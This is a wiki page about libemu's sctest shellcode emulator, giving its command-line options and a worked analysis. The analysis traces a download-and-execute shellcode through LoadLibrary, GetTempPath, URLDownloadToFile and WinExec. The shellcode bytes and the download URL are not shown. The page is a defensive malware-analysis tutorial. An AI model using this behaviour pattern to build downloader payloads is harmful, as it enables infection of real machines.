From aldeid
Jump to navigation Jump to search
You are here:


sctest is part of the libemu testsuite and very usefull when testing new features. Even though the code is historically tainted it may be a usefull source for those who want to setup shellcode emulation allowing win32 api calls and offering hooks on these calls. sctest is not the best example, the code is nerved by the logic for graphing the callflow, but for now it has to work.


-a PATH, --argos-csi=PATH
use this argos csi files as input
-b IP:PORT, --bind=IP:PORT
bind this ip:port
-c IP:PORT, --connect=IP:PORT
redirect connects to this ip:port
-C CMD, --cmd=CMD
command to execute for "cmd" in shellcode (default: cmd="/bin/sh -c \"cd ~/.wine/drive_c/; wine 'c:\windows\system32\cmd_orig.exe' \"")
dump the shellcode (binary) to stdout
-g, --getpc
run getpc mode, try to detect a shellcode
save a dot formatted callgraph in filepath
-h, --help
show this help
-i, --interactive
proxy api calls to the host operating system
-l, --listtests
list all tests
-o [INT|HEX], --offset=[INT|HEX]
manual offset for shellcode, accepts int and hexvalues
-p PATH, --profile=PATH
write shellcode profile to this file
-S, --stdin
read shellcode/buffer from stdin, works with -g
max number of steps to run
-t INTEGER, --testnumber=INTEGER
the test to run
-v, --verbose
be verbose, can be used multiple times, f.e. -vv


Let's use libemu sctest to analyze the following shellcode (lines have been wrapped):

$ more shellcode.hex 

We will use following alias to convert this shellcode to raw binary:

$ grep hex2raw ~/.bash_aliases 
alias hex2raw="tr -d '\\\x' | xxd -r -p"
$ cat shellcode.hex | hex2raw > shellcode.raw 

Now, let's use sctest:

$ cat shellcode.raw | sctest -Svs 10000000 > sctest-out.txt 

Here is the output:

Code excerpt Explanation
$ more sctest-out.txt 
verbose = 1
Hook me Captain Cook!
userhooks.c:108 user_hook_ExitProcess
stepcount 295460
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fc6 => 
           = "urlmon";
) = 0x7df20000;
Call LoadLibrary to load urlmon.dll, required later to invoke URLDownloadToFile
DWORD GetTempPathA (
     DWORD nBufferLength = 260;
     LPTSTR lpBuffer = 0x00416ec2 => 
           = "c:\tmp\";
) =  7;
Call GetTempPathA to determine the path where the downloaded file will be saved
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 => 
     LPCTSTR szURL = 0x00417140 => 
           = "
     LPCTSTR szFileName = 0x00416ec2 => 
           = "c:\tmp\wJQs.exe";
     DWORD dwReserved = 0;
) =  0;
Call URLDownloadToFile to download and save a file from the remote URL
     LPCSTR lpCmdLine = 0x00416ec2 => 
           = "c:\tmp\wJQs.exe";
     UINT uCmdShow = 1;
) =  32;
Call WinExec to execute the downlaoded file
void ExitProcess (
     UINT uExitCode = 1952201315;
) =  0;
Call ExitProcess to exit the process that has downloaded the file


blog comments powered by Disqus